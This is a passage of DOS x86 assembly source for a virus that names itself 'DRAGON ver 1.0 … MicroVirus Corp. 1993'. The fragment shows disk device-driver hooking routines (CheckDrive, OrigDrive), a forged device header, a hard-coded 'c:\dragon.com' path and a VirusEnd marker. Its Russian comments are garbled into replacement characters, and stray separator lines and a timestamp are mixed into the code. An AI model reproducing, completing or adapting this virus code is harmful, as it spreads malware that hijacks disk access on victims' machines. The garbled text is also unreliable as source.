mov byte ptr es:[bx+2],08h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>뢮<EFBFBD> ( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|
|
|
|
|
call OrigDrive ;<3B>맢<EFBFBD><EBA7A2><EFBFBD> <20>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD>
|
|
|
|
|
|
;<3B><>᪠
|
|
|
|
|
|
mov es:[bx+2],ah ;<3B><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
and byte ptr es:[bx+4],7fh ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䫠<> <20>訡<EFBFBD><E8A8A1>
|
|
|
|
|
|
ret
|
|
|
|
|
|
Write endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Check Disk *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
CheckDrive proc near
|
|
|
|
|
|
mov al,[bx+1] ;AL : <20><><EFBFBD><EFBFBD><EFBFBD> <20><>᪠
|
|
|
|
|
|
|
|
|
|
|
|
drive: cmp al,-1 ;<3B><><EFBFBD><EFBFBD> ᬥ<><E1ACA5><EFBFBD><EFBFBD><EFBFBD>?
|
|
|
|
|
|
mov byte ptr cs:[drive+1],al ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>᪠?
|
|
|
|
|
|
jne Change ;<3B><> - <20><><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD> <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|
|
|
|
|
;ᬥ<><E1ACA5><EFBFBD><EFBFBD><EFBFBD> <20><> 䫮<><E4ABAE><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
push [bx+0eh]
|
|
|
|
|
|
mov byte ptr [bx+2],01h ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>⥫<EFBFBD>
|
|
|
|
|
|
call OrigDrive ;<3B>맢<EFBFBD><EBA7A2><EFBFBD> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD> <20><>᪠
|
|
|
|
|
|
cmp byte ptr [bx+0eh],01h ;<3B><><EFBFBD><EFBFBD> ᬥ<><E1ACA5><EFBFBD><EFBFBD><EFBFBD>?
|
|
|
|
|
|
pop [bx+0eh]
|
|
|
|
|
|
mov [bx+2],ah ;<3B><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS
|
|
|
|
|
|
|
|
|
|
|
|
Change: ret
|
|
|
|
|
|
CheckDrive endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Get Next Cluster *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
Bad proc near
|
|
|
|
|
|
dec bp ;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
Cluster: mov ax,00h ;AX : <20><> ᥪ<><E1A5AA> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;( <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|
|
|
|
|
sub word ptr cs:StartSector+3,ax
|
|
|
|
|
|
ret
|
|
|
|
|
|
Bad endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Call Original Device Drive *** <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
OrigDrive proc near
|
|
|
|
|
|
; jmp far 70h:xxxxh
|
|
|
|
|
|
db 9ah ;<3B>맢<EFBFBD><EBA7A2><EFBFBD> <20><><EFBFBD>楤<EFBFBD><E6A5A4><EFBFBD> <20><><EFBFBD><EFBFBD>⥣<EFBFBD><E2A5A3>
|
|
|
|
|
|
Strat: dw ?,70h ;<3B>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD>쭮<EFBFBD><ECADAE> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD><EFBFBD> <20><>᪠
|
|
|
|
|
|
; jmp far 70h:xxxxh
|
|
|
|
|
|
db 9ah ;<3B>맢<EFBFBD><EBA7A2><EFBFBD> <20><><EFBFBD>楤<EFBFBD><E6A5A4><EFBFBD> <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD>
|
|
|
|
|
|
Intr: dw ?,70h ;<3B>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD>쭮<EFBFBD><ECADAE> <20>ࠩ<EFBFBD><E0A0A9><EFBFBD><EFBFBD> <20><>᪠
|
|
|
|
|
|
ret
|
|
|
|
|
|
OrigDrive endp
|
|
|
|
|
|
|
|
|
|
|
|
dragon endp
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Data Area *** <20>
|
|
|
|
|
|
;<3B> Begin <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
header: inc ax
|
|
|
|
|
|
ret
|
|
|
|
|
|
dw 1
|
|
|
|
|
|
dw 2000h ;<3B><><EFBFBD>ਡ<EFBFBD><E0A8A1> <20><><EFBFBD>ன<EFBFBD>⢠:
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><>ଠ<EFBFBD> <20><> IBM
|
|
|
|
|
|
dw offset Strategy ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><>楤<EFBFBD><E6A5A4><EFBFBD> <20><><EFBFBD><EFBFBD>⥣<EFBFBD><E2A5A3>
|
|
|
|
|
|
dw offset Inter ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>楤<EFBFBD><E6A5A4><EFBFBD> <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD>
|
|
|
|
|
|
db 7fh ;<3B><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ன<EFBFBD><E0AEA9><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
file db 'c:\dragon.com',0
|
|
|
|
|
|
param dw 0,80h,?,5ch,?,6ch,? ;<3B><>ࠬ<EFBFBD><E0A0AC><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>᪠
|
|
|
|
|
|
;<3B><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>
|
|
|
|
|
|
|
|
|
|
|
|
CopyRight db 'DRAGON ver 1.0 Copyright (c) MicroVirus Corp. 1993',0
|
|
|
|
|
|
Lords db 'The Lords of the Computers !',0,0
|
|
|
|
|
|
Lord db 'DRAGON - the Lord of Disks !',0,0
|
|
|
|
|
|
Author db 'anti'
|
|
|
|
|
|
RecNum db ? ;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
VirusEnd db ?
|
|
|
|
|
|
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;<3B> *** Data Area *** <20>
|
|
|
|
|
|
;<3B> End <20>
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
code ends
|
2021-01-12 23:41:47 +00:00
|
|
|
|
end dragon�
|
